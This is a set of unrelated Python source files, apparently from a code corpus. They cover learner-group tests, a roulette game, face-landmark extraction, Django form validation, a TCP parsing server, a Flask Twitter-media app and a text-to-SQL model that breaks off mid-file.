['subtopic_id_1'], ['story_id_1'])
def test_get_new_learner_group_id(self) -> None:
self.assertIsNotNone(learner_group_fetchers.get_new_learner_group_id())
def test_get_learner_group_by_id(self) -> None:
fake_learner_group_id = 'fake_learner_group_id'
fake_learner_group = learner_group_fetchers.get_learner_group_by_id(
fake_learner_group_id)
self.assertIsNone(fake_learner_group)
learner_group = learner_group_fetchers.get_learner_group_by_id(
self.LEARNER_GROUP_ID
)
# Ruling out the possibility of None for mypy type checking.
assert learner_group is not None
self.assertIsNotNone(learner_group)
self.assertEqual(learner_group.group_id, self.LEARNER_GROUP_ID)
with self.assertRaisesRegex(
Exception,
'No LearnerGroupModel found for the given group_id: '
'fake_learner_group_id'
):
learner_group_fetchers.get_learner_group_by_id(
fake_learner_group_id, strict=True
)
def test_raises_error_if_learner_group_model_is_fetched_with_strict_and_invalid_id( # pylint: disable=line-too-long
self
) -> None:
with self.assertRaisesRegex(
Exception,
'No LearnerGroupsUserModel exists for the user_id: invalid_id'
):
learner_group_fetchers.get_learner_group_models_by_ids(
['invalid_id'], strict=True
)
def test_get_learner_groups_of_facilitator(self) -> None:
fake_facilitator_id = 'fake_facilitator_id'
fake_learner_groups = (
learner_group_fetchers.get_learner_groups_of_facilitator(
fake_facilitator_id
)
)
self.assertEqual(len(fake_learner_groups), 0)
learner_groups = (
learner_group_fetchers.get_learner_groups_of_facilitator(
self.FACILITATOR_ID
)
)
self.assertEqual(len(learner_groups), 1)
self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
def test_can_multi_learners_share_progress(self) -> None:
learner_group_services.add_learner_to_learner_group(
self.LEARNER_GROUP_ID, self.LEARNER_ID_1, True)
learner_group_services.add_learner_to_learner_group(
self.LEARNER_GROUP_ID, self.LEARNER_ID_2, False)
self.assertEqual(
learner_group_fetchers.can_multi_learners_share_progress(
[self.LEARNER_ID_1, self.LEARNER_ID_2], self.LEARNER_GROUP_ID
), [True, False])
def test_get_invited_learner_groups_of_learner(self) -> None:
fake_learner_id = 'fake_learner_id'
learner_groups = (
learner_group_fetchers.get_invited_learner_groups_of_learner(
fake_learner_id
)
)
self.assertEqual(len(learner_groups), 0)
learner_groups = (
learner_group_fetchers.get_invited_learner_groups_of_learner(
self.LEARNER_ID_1
)
)
self.assertEqual(len(learner_groups), 1)
self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
def test_get_learner_groups_joined_by_learner(self) -> None:
learner_groups = (
learner_group_fetchers.get_learner_groups_joined_by_learner(
self.LEARNER_ID_1
)
)
self.assertEqual(len(learner_groups), 0)
learner_group_services.add_learner_to_learner_group(
self.LEARNER_GROUP_ID, self.LEARNER_ID_1, True)
learner_groups = (
learner_group_fetchers.get_learner_groups_joined_by_learner(
self.LEARNER_ID_1
)
)
self.assertEqual(len(learner_groups), 1)
self.assertEqual(learner_groups[0].group_id, self.LEARNER_GROUP_ID)
|
# pyroulette in development. dave ikin 2021
# roulette simulator
from sys import exit
from random import choice
def roulette():
numbers = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]
x = choice(numbers)
print(f' {x} wins.')
again = input('Again? y/n')
if again == 'y' or again == 'Y':
roulette()
else: exit()
roulette()
|
# переработка фотки лица в набор координат
import sys
import os
import cv2
import numpy as np
from matplotlib import pyplot as plt
BLOCKS_COUNT = 4
"""
Объявляем параметры которые нужны для обучения
face_params = (x, y, w, h) координаты и размеры найденного лица
eyes_params = (x, y, w, h) координаты и размеры пары глаз
left_eye = (x, y, r) координаты и радиус найденного зрачка
right_eye = (x, y, r) координаты и радиус найденного зрачка
"""
def decode(block_index):
face_params = None
eyes_params = None
left_eye = None
right_eye = None
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt3.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_mcs_eyepair_big.xml')
block_data = []
block_dir = os.walk('{0}'.format(block_index))
for d, dirs, files in block_dir:
# Пройдем по всем папкам
for f in files:
img = cv2.imread('{0}/{1}'.format(block_index, f))
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
height, width, bpc = img.shape
bpl = bpc * width
tmp_imp = None
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# gray_hist = cv2.equalizeHist(gray, img)
faces = face_cascade.detectMultiScale(gray, 1.35, 5)
if not faces is None and len(faces) > 0:
for (x, y, w, h) in faces:
face_params = (x, y, w, h)
roi_gray = gray[y:y + h, x:x + w]
roi_color = img[y:y + h, x:x + w]
roi_gray = cv2.equalizeHist(roi_gray, roi_color)
eyes = eye_cascade.detectMultiScale(roi_gray, 1.3, 3)
if not eyes is None and len(eyes) > 0:
# найдена пара глаз.
for (ex, ey, ew, eh) in eyes:
eyes_params = (ex, ey, ew, eh)
tmp_imp = roi_color[ey:ey + eh, ex:ex + ew]
tmp_h, tmp_w, tmp_bpc = tmp_imp.shape
# левый глаз
half_y = ey + int(eh/2)
half_x = ex + int(ew/2)
roi_gray_left_img = roi_gray[ey: ey + eh, ex: half_x]
# правый глаз
roi_gray_right_img = roi_gray[ey: ey + eh, half_x:]
# поищем зрачки
left_eye = get_circles(roi_gray_left_img, tmp_w)
right_eye = get_circles(roi_gray_right_img, tmp_w)
left_eye_corners = get_eye_corners(roi_gray_left_img)
right_eye_corners = get_eye_corners(roi_gray_right_img)
break
else:
# не найдено. удалить бы фотку
pass
break
else:
pass
# Лицо на фото не найдено, удалить бы фотку
face_decoded = {
'face_params': face_params,
'eyes_params': eyes_params,
'left_eye': left_eye,
'right_eye': right_eye,
'left_eye_corners': left_eye_corners,
'right_eye_corners': right_eye_corners,
'block_id': block_index
}
if check_data(face_decoded):
block_data.append(face_decoded)
return block_data
def get_circles(img, tmp_w):
""" Возвращает координаты и радиус для зрачка (x, y ,r)"""
#img = cv2.medianBlur(img, 5)
#print(tmp_w)
circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,2, tmp_w/3,
param1=30,param2=30,minRadius=0,maxRadius=0)
if not circles is None:
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
return (i[0], i[1], i[2])
else:
return None
def get_eye_corners(img):
""" Возвращает точки углов на глазах"""
#blur = cv2.Canny(img, 100, 200)
img = np.array(img)
#gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# blur = cv2.medianBlur(gray,5)
#blur = cv2.GaussianBlur(gray, (5, 5), 0)
# blur = cv2.bilateralFilter(gray,9,75,75)
# img = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
#img = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
corners = cv2.goodFeaturesToTrack(img, 20, 0.01, 30)
if not corners is None:
corners = np.int0(corners)
# corners = []
for i in corners:
# if i>0.01 * max_val:
x, y = i.ravel()
return (x, y)
def check_data(data_tpl):
return not None in data_tpl
if __name__ == '__main__':
data = []
for i in range(BLOCKS_COUNT):
decoded = decode(i)
data.append(decode(i))
print(data) |
import pandas as pd
# specify the keywords to look for
keywords = [
"public review",
"public hearing",
"vote",
"public participation"
]
# open the NYC city charter text file exported from
# http://library.amlegal.com/nxt/gateway.dll/New%20York/charter/newyorkcitycharter?f=templates$fn=default.htm$3.0$vid=amlegal:newyork_ny
f = open('document.txt', 'r')
# split the text content into individual lines
lines = f.readlines()
# create empty dataframe that will be used to capture sections of the charter that contain our targetted keywords
df = pd.DataFrame(columns=['Chapter', 'Section'])
i = 0
for line in lines:
# get the chapter the line is within. this value stays constant until the next chapter is entered.
if line.startswith('Chapter'):
chapter = line[7:(len(line)-1)]
# get the section the line is within. this value stays constant until the next section is entered.
if line.startswith('Section'):
section = line[7:(len(line)-1)]
# count the number keywords that are present in the line of text
count = 0
for keyword in keywords:
count += line.count(keyword)
# if at least one keyword is present in the line of text, append the current chapter-section to the dataframe
if count > 0:
df = df.append({'Chapter' : chapter , 'Section' : section} , ignore_index=True)
# increase line number for next line
i += 1
# remove duplicate chapters and sections
df = df.drop_duplicates()
# save the dataframe to a csv file
df.to_csv('inventory.csv')
|
# -*- coding: utf-8 -*-
from django import forms
class StudentInfoForm(forms.Form):
id = forms.CharField(max_length=10)
contact = forms.CharField(max_length=11)
name = forms.CharField(max_length=20)
gender = forms.IntegerField()
college = forms.CharField(max_length=50)
major = forms.CharField(max_length=50)
grade = forms.IntegerField()
gpa = forms.FloatField()
credits = forms.FloatField()
def clean_id(self):
id = self.cleaned_data['id']
if len(id) != 10 and not str(id).isdigit():
raise forms.ValidationError("学号为10位数字!")
return id
def clean_contact(self):
contact = self.cleaned_data['contact']
if not str(contact).isdigit():
raise forms.ValidationError("电话号码为纯数字!")
return contact
def clean_gender(self):
gender = self.cleaned_data['gender']
if gender != 1 and gender != 0:
raise forms.ValidationError("不要干坏事哦!")
return gender
class FacultyInfoForm(forms.Form):
id = forms.CharField(max_length=10)
contact = forms.CharField(max_length=11)
name = forms.CharField(max_length=20)
gender = forms.IntegerField()
college = forms.CharField(max_length=50)
major = forms.CharField(max_length=50)
degree = forms.CharField(max_length=20)
title = forms.CharField(max_length=20)
def clean_id(self):
id = self.cleaned_data['id']
if len(id) != 6 and not str(id).isdigit():
raise forms.ValidationError("学号为6位数字!")
return id
def clean_contact(self):
contact = self.cleaned_data['contact']
if not str(contact).isdigit():
raise forms.ValidationError("电话号码为纯数字!")
return contact
def clean_gender(self):
gender = self.cleaned_data['gender']
if gender != 1 and gender != 0:
raise forms.ValidationError("不要干坏事哦!")
return gender
class AdminInfoForm(forms.Form):
id = forms.CharField(max_length=10)
contact = forms.CharField(max_length=11)
name = forms.CharField(max_length=20)
gender = forms.IntegerField()
college = forms.CharField(max_length=50)
def clean_id(self):
id = self.cleaned_data['id']
if len(id) != 3 and not str(id).isdigit():
raise forms.ValidationError("学号为3位数字!")
return id
def clean_contact(self):
contact = self.cleaned_data['contact']
if not str(contact).isdigit():
raise forms.ValidationError("电话号码为纯数字!")
return contact
def clean_gender(self):
gender = self.cleaned_data['gender']
if gender != 1 and gender != 0:
raise forms.ValidationError("不要干坏事哦!")
return gender
class UserPhotoForm(forms.Form):
photo = forms.FileField(
label='Select a file',
help_text='max. 20 megabytes'
)
def clean_photo(self):
CONTENT_TYPES = ['image']
MAX_UPLOAD_SIZE = 1024*1024*2 #2M
photo = self.cleaned_data['photo']
content_type = photo.content_type.split('/')[0]
if content_type in CONTENT_TYPES:
if photo._size > MAX_UPLOAD_SIZE:
raise forms.ValidationError('上传大小限制为20M!')
else:
raise forms.ValidationError('请上传图像文件!')
return photo
|
#! /usr/bin/python
#coding=utf-8
import socket
import ParseData
import readxml
import struct
import time
import ConfigParser
HOST = ''
PORT = 50001
ADDR = (HOST, PORT)
BUFFSIZE = 65535
def xmlparse(fname):
configdict = readxml.ConvertXmlToDict(fname)
#data = struct.pack('!B3sBHB2I', 1, '234', 0x00, 6, 7, 8, 9)
#data += struct.pack('!2H2B4s2B3sBB5sB', 1, 2, 1, 4, 'asdf', 2, 3, 'qwe', 8, 5, 'qwert', 112)
#parse(data, configdict['policy'])
return configdict['policy']
def initserver():
xmldict = xmlparse('DataParse.xml')
print "success parse xml ..."
cfg = ConfigParser.ConfigParser()
cfg.read('server.ini')
logname = cfg.get('SETTING', 'log')
f = open(logname, 'w')
port = cfg.getint('SETTING', 'PORT')
addr = ('', port)
tcpsrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsrv.bind(addr)
tcpsrv.listen(10)
print "waiting for client connect ...."
while True:
clientsock , c_addr = tcpsrv.accept()
print 'accept sock'
while True:
try:
#clientsock.settimeout(5)
msg = clientsock.recv(BUFFSIZE)
print "msg lenth", len(msg)
if not msg: break
else:
try:
ack,log = ParseData.parse(msg, xmldict)
clientsock.send(ack)
f.write(log + '\r')
except struct.error:
print 'parse error'
clientsock.close()
break
except socket.timeout:
clientsock.close()
print 'socket close'
break
except socket.error:
clientsock.close()
print 'socket close'
break
tcpsrv.close()
f.close()
if __name__ == '__main__':
initserver()
time.sleep(1)
|
import os
import itertools
import numpy as np
import cPickle
from collections import Counter
from sklearn.neighbors import NearestNeighbors
src_tag = 'val'
base_dir = '/media/researchshare/linjie/data/'
target_path = base_dir + 'snapchat/features/vgg.bin'
src_path = base_dir + 'dreamstime/features/vgg_'+src_tag+'.bin'
target = cPickle.load(open(target_path,'rb'))
src = cPickle.load(open(src_path,'rb'))
#sample src for quick debugging
#src = src[:1000][:]
keyw_path = base_dir + 'dreamstime/keywords_dreamstime_list'
keywords = cPickle.load(open(keyw_path,'rb'))
list_path = '%s_list.txt' % src_tag
with open(list_path,'r') as f:
image_list = [line.strip('\n') for line in f]
image_n = len(image_list)
feature_n = src.shape[0]
print image_n
print feature_n
tg_list_path = '../snapchat/test_list.txt'
with open(tg_list_path,'r') as f:
tg_im_list = [line.strip() for line in f]
tg_im_n = len(tg_im_list)
tg_feat_n = target.shape[0]
print tg_im_n
print tg_feat_n
nn=10
nbrs = NearestNeighbors(n_neighbors=nn, algorithm='ball_tree').fit(src)
distances, indices = nbrs.kneighbors(target)
print indices.shape
target_n = target.shape[0]
keyword_top = 8
top_words = []
for i in xrange(target_n):
#print image_list[indices[i][0]]
keywords_c =list(itertools.chain(* [keywords[image_list[indices[i][x]][:-6].split('/')[-1]] \
for x in xrange(nn)]))
keywords_count = Counter(keywords_c)
most_c = keywords_count.most_common(keyword_top)
top_words.append([item[0] for item in most_c])
sav_file = '../snapchat/keywords_res.txt'
#print tg_im_list[0]
#print ' '.join(top_words[0])
with open(sav_file,'w') as f:
for i in xrange(target_n):
f.write('%s %s\n' % (tg_im_list[i][:-2],' '.join(top_words[i])))
|
# Client that doesn't use the Name Server. Uses URI directly.
from __future__ import print_function
import sys
import Pyro4
if sys.version_info < (3, 0):
input = raw_input
uri = input("Enter the URI of the quote object: ")
with Pyro4.core.Proxy(uri) as quotegen:
print("Getting some quotes...")
print(quotegen.quote())
print(quotegen.quote())
|
from flask import Flask, jsonify, request, current_app, send_from_directory
import twitter_to_movie as t2m
from pymongo import MongoClient
import datetime
app = Flask(__name__, static_url_path='')
@app.route("/", methods=["GET"])
def send_index():
return send_from_directory('', 'index.html')
@app.route("/output.mp4", methods=["GET"])
def send_html():
return send_from_directory('', "output.mp4")
@app.route("/api/histo", methods=["GET"])
def get_histo():
client = MongoClient()
db = client["db"]
users = db["twitter"]
cursor = users.find({})
labels = []
for document in cursor:
if "phrases" in document.keys():
for ele in document["phrases"]:
labels += ele.split(">")
histd = {}
for label in labels:
if label in histd.keys():
histd[label] += 1
else:
histd[label] = 1
li = []
for key in histd.keys():
li.append([key, histd[key]])
li = sorted(li, key=lambda x: x[1])[::-1]
li2 = []
for key in histd.keys():
li2.append({"label": key, "y": histd[key]})
li2 = sorted(li2, key=lambda x: x["y"])[::-1]
return jsonify(dict(histo=histd, arr=li, ss=li2))
@app.route("/api/getlabels", methods=["GET"])
def get_labels():
try:
name = request.args.get("name", None)
if name is None:
return jsonify({"error": "No screenname specified"})
else:
print(name)
labels, images = t2m.get_twitter_media_analysis(name,
count=200,
exclude_replies=True,
delete_movie=False)
phrases = []
for lab in labels:
[phrases.append(x[0]) for x in lab["labels"]]
client = MongoClient()
db = client["db"]
users = db["twitter"]
users.insert_one(dict(handle=name, num_images=len(images), images=images, phrases=phrases, labels=labels, time=datetime.datetime.now().strftime("%Y/%m/%d %H:%M")))
client.close()
return jsonify(labels)
except Exception as e:
return jsonify({"error":str(e)})
if __name__ == "__main__":
app.run(host="localhost", use_reloader=False, threaded=True, port=3000) |
def SumFunc(num):
'''Take in integer i and return sum of all multiples of 3 and 5 below it'''
answer = 0
for i in range(0,num):
if i % 3 == 0 or i % 5 == 0:
answer += i
return answer
print(SumFunc(1000))
|
import json
import torch
import datetime
import time
import argparse
import numpy as np
import torch.nn as nn
import traceback
from collections import defaultdict
from utils.word_embedding import WordEmbedding
from models.agg_predictor import AggPredictor
from models.col_predictor import ColPredictor
from models.desasc_limit_predictor import DesAscLimitPredictor
from models.having_predictor import HavingPredictor
from models.keyword_predictor import KeyWordPredictor
from models.multisql_predictor import MultiSqlPredictor
from models.root_teminal_predictor import RootTeminalPredictor
from models.andor_predictor import AndOrPredictor
from models.op_predictor import OpPredictor
from preprocess_data import index_to_column_name
SQL_OPS = ('none', 'intersect', 'union', 'except')
KW_OPS = ('where', 'groupBy', 'orderBy')
AGG_OPS = ('max', 'min', 'count', 'sum', 'avg')
ROOT_TERM_OPS = ("root", "terminal")
COND_OPS = ("and", "or")
DEC_ASC_OPS = (("asc", True), ("asc", False), ("desc", True), ("desc", False))
NEW_WHERE_OPS = (
'=',
'>',
'<',
'>=',
'<=',
'!=',
'like',
'not in',
'in',
'between')
KW_WITH_COL = ("select", "where", "groupBy", "orderBy", "having")
class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items) - 1]
def size(self):
return len(self.items)
def insert(self, i, x):
return self.items.insert(i, x)
def to_batch_tables(tables, B, table_type):
# col_lens = []
col_seq = []
ts = [
tables["table_names"],
tables["column_names"],
tables["column_types"]]
tname_toks = [x.split(" ") for x in ts[0]]
col_type = ts[2]
cols = [x.split(" ") for xid, x in ts[1]]
tab_seq = [xid for xid, x in ts[1]]
cols_add = []
for tid, col, ct in zip(tab_seq, cols, col_type):
col_one = [ct]
if tid == -1:
tabn = ["all"]
else:
if table_type == "no":
tabn = []
else:
tabn = tname_toks[tid]
for t in tabn:
if t not in col:
col_one.append(t)
col_one.extend(col)
cols_add.append(col_one)
col_seq = [cols_add] * B
return col_seq
class SuperModel(nn.Module):
def __init__(
self,
word_emb,
col_emb,
N_word,
N_col,
N_h,
N_depth,
dropout,
gpu=True,
trainable_emb=False,
table_type="std",
use_hs=True):
super(SuperModel, self).__init__()
self.gpu = gpu
self.N_h = N_h
self.N_depth = N_depth
self.dropout = dropout
self.trainable_emb = trainable_emb
self.table_type = table_type
self.use_hs = use_hs
self.SQL_TOK = [
'<UNK>',
'<END>',
'WHERE',
'AND',
'EQL',
'GT',
'LT',
'<BEG>']
# word embedding layer
self.embed_layer = WordEmbedding(word_emb, N_word, gpu,
self.SQL_TOK, trainable=trainable_emb)
self.q_embed_layer = self.embed_layer
if not col_emb:
N_col = None
else:
self.embed_layer = WordEmbedding(
col_emb, N_col, gpu, self.SQL_TOK, trainable=trainable_emb)
# initial all modules
self.multi_sql = MultiSqlPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.multi_sql.eval()
self.key_word = KeyWordPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.key_word.eval()
self.col = ColPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.col.eval()
self.op = OpPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.op.eval()
self.agg = AggPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.agg.eval()
self.root_teminal = RootTeminalPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.root_teminal.eval()
self.des_asc = DesAscLimitPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.des_asc.eval()
self.having = HavingPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.having.eval()
self.andor = AndOrPredictor(
N_word=N_word,
N_col=N_col,
N_h=N_h,
N_depth=N_depth,
dropout=dropout,
gpu=gpu,
use_hs=use_hs)
self.andor.eval()
self.softmax = nn.Softmax() # dim=1
self.CE = nn.CrossEntropyLoss()
self.log_softmax = nn.LogSoftmax()
self.mlsml = nn.MultiLabelSoftMarginLoss()
self.bce_logit = nn.BCEWithLogitsLoss()
self.sigm = nn.Sigmoid()
if gpu:
self.cuda()
self.path_not_found = 0
def forward(self, q_seq, history, tables):
# if self.part:
# return self.part_forward(q_seq,history,tables)
# else:
return self.full_forward(q_seq, history, tables)
def full_forward(self, q_seq, history, tables):
B = len(q_seq)
# print("q_seq:{}".format(q_seq))
# print("Batch size:{}".format(B))
q_emb_var, q_len = self.q_embed_layer.gen_x_q_batch(q_seq)
col_seq = to_batch_tables(tables, B, self.table_type)
col_emb_var, col_name_len, col_len = self.embed_layer.gen_col_batch(
col_seq)
mkw_emb_var = self.embed_layer.gen_word_list_embedding(
["none", "except", "intersect", "union"], (B))
mkw_len = np.full(q_len.shape, 4, dtype=np.int64)
kw_emb_var = self.embed_layer.gen_word_list_embedding(
["where", "group by", "order by"], (B))
kw_len = np.full(q_len.shape, 3, dtype=np.int64)
stack = Stack()
stack.push(("root", None))
history = [["root"]] * B
andor_cond = ""
has_limit = False
# sql = {}
current_sql = {}
sql_stack = []
idx_stack = []
kw_stack = []
kw = ""
nested_label = ""
has_having = False
timeout = time.time() + 2 # set timer to prevent infinite recursion in SQL generation
failed = False
while not stack.isEmpty():
if time.time() > timeout:
failed = True
break
vet = stack.pop()
# print(vet)
hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(history)
if len(idx_stack) > 0 and stack.size() < idx_stack[-1]:
# print("pop!!!!!!!!!!!!!!!!!!!!!!")
idx_stack.pop()
current_sql = sql_stack.pop()
kw = kw_stack.pop()
# current_sql = current_sql["sql"]
# history.append(vet)
# print("hs_emb:{} hs_len:{}".format(hs_emb_var.size(),hs_len.size()))
if isinstance(vet, tuple) and vet[0] == "root":
if history[0][-1] != "root":
history[0].append("root")
hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
history)
if vet[1] != "original":
idx_stack.append(stack.size())
sql_stack.append(current_sql)
kw_stack.append(kw)
else:
idx_stack.append(stack.size())
sql_stack.append(sql_stack[-1])
kw_stack.append(kw)
if "sql" in current_sql:
current_sql["nested_sql"] = {}
current_sql["nested_label"] = nested_label
current_sql = current_sql["nested_sql"]
elif isinstance(vet[1], dict):
vet[1]["sql"] = {}
current_sql = vet[1]["sql"]
elif vet[1] != "original":
current_sql["sql"] = {}
current_sql = current_sql["sql"]
# print("q_emb_var:{} hs_emb_var:{} mkw_emb_var:{}".format(q_emb_var.size(),hs_emb_var.size(),mkw_emb_var.size()))
if vet[1] == "nested" or vet[1] == "original":
stack.push("none")
history[0].append("none")
else:
score = self.multi_sql.forward(
q_emb_var, q_len, hs_emb_var, hs_len, mkw_emb_var, mkw_len)
label = np.argmax(score[0].data.cpu().numpy())
label = SQL_OPS[label]
history[0].append(label)
stack.push(label)
if label != "none":
nested_label = label
elif vet in ('intersect', 'except', 'union'):
stack.push(("root", "nested"))
stack.push(("root", "original"))
# history[0].append("root")
elif vet == "none":
score = self.key_word.forward(
q_emb_var, q_len, hs_emb_var, hs_len, kw_emb_var, kw_len)
kw_num_score, kw_score = [x.data.cpu().numpy() for x in score]
# print("kw_num_score:{}".format(kw_num_score))
# print("kw_score:{}".format(kw_score))
num_kw = np.argmax(kw_num_score[0])
kw_score = list(np.argsort(-kw_score[0])[:num_kw])
kw_score.sort(reverse=True)
# print("num_kw:{}".format(num_kw))
for kw in kw_score:
stack.push(KW_OPS[kw])
stack.push("select")
elif vet in ("select", "orderBy", "where", "groupBy", "having"):
kw = vet
current_sql[kw] = []
history[0].append(vet)
stack.push(("col", vet))
# score = self.andor.forward(q_emb_var,q_len,hs_emb_var,hs_len)
# label = score[0].data.cpu().numpy()
# andor_cond = COND_OPS[label]
# history.append("")
# elif vet == "groupBy":
# score = self.having.forward(q_emb_var,q_len,hs_emb_var,hs_len,col_emb_var,col_len,)
elif isinstance(vet, tuple) and vet[0] == "col":
# print("q_emb_var:{} hs_emb_var:{} col_emb_var:{}".format(q_emb_var.size(), hs_emb_var.size(),col_emb_var.size()))
score = self.col.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len)
col_num_score, col_score = [
x.data.cpu().numpy() for x in score]
col_num = np.argmax(col_num_score[0]) + 1 # double check
cols = np.argsort(-col_score[0])[:col_num]
# print(col_num)
# print("col_num_score:{}".format(col_num_score))
# print("col_score:{}".format(col_score))
for col in cols:
if vet[1] == "where":
stack.push(("op", "where", col))
elif vet[1] != "groupBy":
stack.push(("agg", vet[1], col))
elif vet[1] == "groupBy":
history[0].append(index_to_column_name(col, tables))
current_sql[kw].append(
index_to_column_name(col, tables))
# predict and or or when there is multi col in where condition
if col_num > 1 and vet[1] == "where":
score = self.andor.forward(
q_emb_var, q_len, hs_emb_var, hs_len)
label = np.argmax(score[0].data.cpu().numpy())
andor_cond = COND_OPS[label]
current_sql[kw].append(andor_cond)
if vet[1] == "groupBy" and col_num > 0:
score = self.having.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len,
np.full(
B,
cols[0],
dtype=np.int64))
label = np.argmax(score[0].data.cpu().numpy())
if label == 1:
has_having = (label == 1)
# stack.insert(-col_num,"having")
stack.push("having")
# history.append(index_to_column_name(cols[-1], tables[0]))
elif isinstance(vet, tuple) and vet[0] == "agg":
history[0].append(index_to_column_name(vet[2], tables))
if vet[1] not in ("having", "orderBy"): # DEBUG-ed 20180817
try:
current_sql[kw].append(
index_to_column_name(vet[2], tables))
except Exception as e:
# print(e)
traceback.print_exc()
print(
"history:{},current_sql:{} stack:{}".format(
history[0], current_sql, stack.items))
print("idx_stack:{}".format(idx_stack))
print("sql_stack:{}".format(sql_stack))
exit(1)
hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
history)
score = self.agg.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len,
np.full(
B,
vet[2],
dtype=np.int64))
agg_num_score, agg_score = [
x.data.cpu().numpy() for x in score]
agg_num = np.argmax(agg_num_score[0]) # double check
agg_idxs = np.argsort(-agg_score[0])[:agg_num]
# print("agg:{}".format([AGG_OPS[agg] for agg in agg_idxs]))
if len(agg_idxs) > 0:
history[0].append(AGG_OPS[agg_idxs[0]])
if vet[1] not in ("having", "orderBy"):
current_sql[kw].append(AGG_OPS[agg_idxs[0]])
elif vet[1] == "orderBy":
# DEBUG-ed 20180817
stack.push(("des_asc", vet[2], AGG_OPS[agg_idxs[0]]))
else:
stack.push(
("op", "having", vet[2], AGG_OPS[agg_idxs[0]]))
for agg in agg_idxs[1:]:
history[0].append(index_to_column_name(vet[2], tables))
history[0].append(AGG_OPS[agg])
if vet[1] not in ("having", "orderBy"):
current_sql[kw].append(
index_to_column_name(vet[2], tables))
current_sql[kw].append(AGG_OPS[agg])
elif vet[1] == "orderBy":
stack.push(("des_asc", vet[2], AGG_OPS[agg]))
else:
stack.push(("op", "having", vet[2], agg_idxs))
if len(agg_idxs) == 0:
if vet[1] not in ("having", "orderBy"):
current_sql[kw].append("none_agg")
elif vet[1] == "orderBy":
stack.push(("des_asc", vet[2], "none_agg"))
else:
stack.push(("op", "having", vet[2], "none_agg"))
# current_sql[kw].append([AGG_OPS[agg] for agg in agg_idxs])
# if vet[1] == "having":
# stack.push(("op","having",vet[2],agg_idxs))
# if vet[1] == "orderBy":
# stack.push(("des_asc",vet[2],agg_idxs))
# if vet[1] == "groupBy" and has_having:
# stack.push("having")
elif isinstance(vet, tuple) and vet[0] == "op":
if vet[1] == "where":
# current_sql[kw].append(index_to_column_name(vet[2], tables))
history[0].append(index_to_column_name(vet[2], tables))
hs_emb_var, hs_len = self.embed_layer.gen_x_history_batch(
history)
score = self.op.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len,
np.full(
B,
vet[2],
dtype=np.int64))
op_num_score, op_score = [x.data.cpu().numpy() for x in score]
# num_score 0 maps to 1 in truth, must have at least one op
op_num = np.argmax(op_num_score[0]) + 1
ops = np.argsort(-op_score[0])[:op_num]
# current_sql[kw].append([NEW_WHERE_OPS[op] for op in ops])
if op_num > 0:
history[0].append(NEW_WHERE_OPS[ops[0]])
if vet[1] == "having":
stack.push(("root_teminal", vet[2], vet[3], ops[0]))
else:
stack.push(("root_teminal", vet[2], ops[0]))
# current_sql[kw].append(NEW_WHERE_OPS[ops[0]])
for op in ops[1:]:
history[0].append(index_to_column_name(vet[2], tables))
history[0].append(NEW_WHERE_OPS[op])
# current_sql[kw].append(index_to_column_name(vet[2], tables))
# current_sql[kw].append(NEW_WHERE_OPS[op])
if vet[1] == "having":
stack.push(("root_teminal", vet[2], vet[3], op))
else:
stack.push(("root_teminal", vet[2], op))
# stack.push(("root_teminal",vet[2]))
elif isinstance(vet, tuple) and vet[0] == "root_teminal":
score = self.root_teminal.forward(
q_emb_var,
q_len,
hs_emb_var,
hs_len,
col_emb_var,
col_len,
col_name_len,
np.full(
B,
vet[1],
dtype=np.int64))
label = np.argmax(score[0].data.cpu().numpy())
label = ROOT_TERM_OPS[label]
if len(vet) == 4:
current_sql[kw].append(
index_to_column_name(vet[1], tables))
current_sql[kw].append(vet[2])
current_sql[kw].append(NEW_WHERE_OPS[vet[3]])
else:
# print("kw:{}".format(kw))
try:
current_sql[kw].append(
index_to_column_name(vet[1], tables))
except Exception as e:
# print(e)
traceback.print_exc()
print(
